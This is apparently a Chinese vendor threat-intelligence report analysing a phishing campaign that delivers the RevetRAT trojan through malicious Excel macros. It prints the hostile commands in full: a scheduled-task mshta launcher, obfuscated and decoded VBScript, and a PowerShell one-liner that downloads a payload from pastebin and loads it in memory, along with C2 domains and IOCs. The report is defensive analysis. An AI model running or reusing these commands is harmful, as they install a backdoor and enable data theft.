商贸信家族新活跃：利用钓鱼邮件传播商业远控木马RevetRAT

概述

近期腾讯安全御见威胁情报中心发现商贸信开始传播商业远控木马RevetRAT。

黑客精心构造的带有宏代码的xls文档，作为邮件附件发送至外贸从业人员的邮箱。

当文档被打开时，宏代码执行并获取保存在代码托管平台pastebin上的远程恶意代码，代码执行后继续下载pastebin上保存的二进制数据，然后将其还原成PE文件(远控木马RevetRAT)，然后注入Powershell进程执行。

攻击过程无文件落地，中招后会窃取用户隐私信息泄露，同时开启后门。从而造成严重影响。

商贸信传播RevetRAT攻击流程

详细分析

攻击时发送的邮件附件名为Hablem Order List.xls(Hablem的订单清单)，该文件为空白excel文件，内有包含了恶意代码的宏。

当用户打开文档，宏代码触发执行如下命令(该命令会被安装为计划任务反复执行)：

C:\Windows\System32\schtasks.exe create /sc MINUTE /mo 100 /tn"MicrofoftOffice19" /tr "mshtavbscript:CreateObject("Wscript.Shell").Run("mshta.exehttps[:]//pastebin.com/raw/UwmtjtG9",0,true)(window.close)

利用mshta.exe执行一段经过混淆编码的javascript脚本。多次带参执行unescape( )后得到以下VBScript代码：

 

"<scriptlanguage="VBScript">

dim PS_le

PS_le = "53 65 74 20 4D 5F 78 61 20 3D20 43 72 65 61 74 65 4F 62 6A 65 63 74 28 53 74 72 52 65 76 65 72 73 65 28 5374 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 65 72 73 65 28 22 6C 6C 65 6853 2E 74 70 69 72 63 53 57 22 29 29 29 29 0D 0A 44 69 6D 20 44 5F 58 41 0D 0A44 5F 58 41 30 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 6572 73 65 28 53 74 72 52 65 76 65 72 73 65 28 22 2F 6D 6F 63 2E 6E 69 62 65 7473 61 70 2F 2F 3A 73 70 74 74 68 27 27 28 67 6E 69 27 2B 27 72 74 53 27 2B 2764 61 6F 6C 6E 27 2B 27 77 6F 44 2E 27 2B 27 29 74 6E 65 69 6C 27 2B 27 43 6265 57 27 2B 27 2E 74 65 4E 27 20 2B 27 29 2A 4F 2D 57 2A 20 4D 43 47 28 26 2827 28 78 65 69 28 78 65 69 20 3D 34 36 63 73 24 5D 5D 5B 65 74 79 42 5B 20 7469 78 65 6F 6E 2D 20 65 78 65 2E 6C 6C 65 68 73 72 65 77 6F 50 22 29 29 29 0D0A 44 5F 58 41 31 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 7665 72 73 65 28 22 72 61 77 2F 79 64 70 70 54 31 70 34 22 29 29 0D 0A 44 5F 5841 32 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 65 72 73 6528 53 74 72 52 65 76 65 72 73 65 28 22 29 58 24 2C 53 24 28 65 6B 6F 76 6E 692E 74 6E 69 6F 50 79 72 74 6E 45 2E 29 34 36 63 73 24 28 64 61 6F 4C 2E 6E 6961 6D 6F 44 74 6E 65 72 72 75 43 3A 3A 5D 6E 69 61 6D 6F 44 70 70 41 5B 3B 2929 27 29 27 27 78 30 27 27 2C 27 27 5E 27 27 28 65 63 61 6C 70 65 72 2E 29 2727 22 29 29 29 0D 0A 44 5F 58 41 20 3D 20 44 5F 58 41 30 20 2B 20 44 5F 58 4131 20 2B 20 44 5F 58 41 32 0D 0A 4D 5F 78 61 2E 52 75 6E 20 44 5F 58 41 2C 2076 62 48 69 64 65"

dim str

Function Mo_Rg(Pin)

  Dima : a = Split(Pin)

  Dimi

  Fori = 0 To UBound(a)

     a(i) = Chr("&H" & a(i))

 Next

 Mo_Rg = Join(a, "")

End Function

str = Mo_Rg(PS_le)

Execute str

self.close

</script>

 

可以看到该VBScript代码仍然包含混淆，但是在最后的执行前，代码自身会进行还原步骤，还原后结果为”str”。添加创建文本文件的代码，并将”str”的内容写入，运行后可以得到解开混淆后的VBScript：

 

Set M_xa = CreateObject(StrReverse(StrReverse(StrReverse("llehS.tpircSW"))))
Dim D_XA
D_XA0 = StrReverse(StrReverse(StrReverse("/moc.nibetsap//:sptth''(gni'+'rtS'+'daoln'+'woD.'+')tneil'+'CbeW'+'.teN' +')*O-W* MCG(&('(xei(xei =46cs$]][etyB[ tixeon- exe.llehsrewoP")))
D_XA1 = StrReverse(StrReverse("raw/ydppT1p4"))
D_XA2 = StrReverse(StrReverse(StrReverse(")X$,S$(ekovni.tnioPyrtnE.)46cs$(daoL.niamoDtnerruC::]niamoDppA[;))')''x0'',''^''(ecalper.)''")))
D_XA = D_XA0 + D_XA1 + D_XA2
M_xa.Run D_XA, vbHide

 

代码字符串翻转函数StrReverse，在执行时将字符串进行翻转，经过翻转调整后，最终执行的WScript.Shell代码为：

 

Powershell.exe -noexit [Byte[]]$sc64=iex(iex('(&(GCM *W-O*)'+'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https[:]//pastebin.com/raw/ydppT1p4'').replace(''^'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)

 

该段代码的功能为下载恶意代码'https[:]//pastebin.com/raw/ydppT1p4，替换掉部分字符得到完整的PE文件数据，然后将其通过内存反射加载至Powershell进程中执行。

 

远控木马分析

将“ydppT1p4”还原为PE文件后，分析发现作者将木马的主类命名为nuclear_explosion(核爆炸)。通过其C2及互斥变量关联分析，可以确认该样本为远控木马RevetRAT。

RevetRAT木马在2017年3月被国外安全厂商发现。

1. RevetRAT创建以下名称的互斥体以保证在电脑上执行时具有唯一实例。

RV_MUTEX

RV_MUTEX- [RANDOM NAME]

 

2. RevetRAT还会创建计划任务以达到持久化。在受感染的计算机上打开后门，并连接到远程地址，与硬编码的地址相似的域名还有：

collabora-yehuda.duckdns.org

brokaw.duckdns.org

dodirat.duckdns.org

ubntmanagement.duckdns.org

vazzart.duckdns.org

cloud-neferet.duckdns.org

gjbtulsa.duckdns.org

undefinedx-1.duckdns.org

nullpoo.duckdns.org

tacografo.duckdns.org

...

 

3. 木马接收C2指令，基于指令在受感染的计算机上执行以下操作：

1）下载文件

2）执行文件

3）更新

4）暂停，重新启动和卸载自身

 

4. 收集用户信息将其发送到远程地址：

包括本地IP地址，电脑名称，用户名，操作系统，物理内存，安全软件等信息

 

其部分功能代码如下:

连接C2地址

循环接收数据

解析数据

搜集本地IP

CPU型号

杀软信息

磁盘信息

编码并发送数据

 

安全建议

1、不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描；

2、升级office系列软件到最新版本，不要随意运行不可信文档中的宏； 

3、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击；

4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统;

IOCs

MD5

264FBADC7B4AFB279DC653A2A2F651B0

89A5569E297B3D8F2F832AA0E010FD45

8EC984FC092F1676714E944C2F0F1482

 URL

https[:]//pastebin.com/raw/UwmtjtG9

https[:]//pastebin.com/raw/ydppT1p4

https[:]//pastebin.com/raw/w3Y29LYH

C&C

jigijigi.duckdns.org

collabora-yehuda.duckdns.org

brokaw.duckdns.org

dodirat.duckdns.org

ubntmanagement.duckdns.org

vazzart.duckdns.org

cloud-neferet.duckdns.org

gjbtulsa.duckdns.org

undefinedx-1.duckdns.org

nullpoo.duckdns.org

tacografo.duckdns.org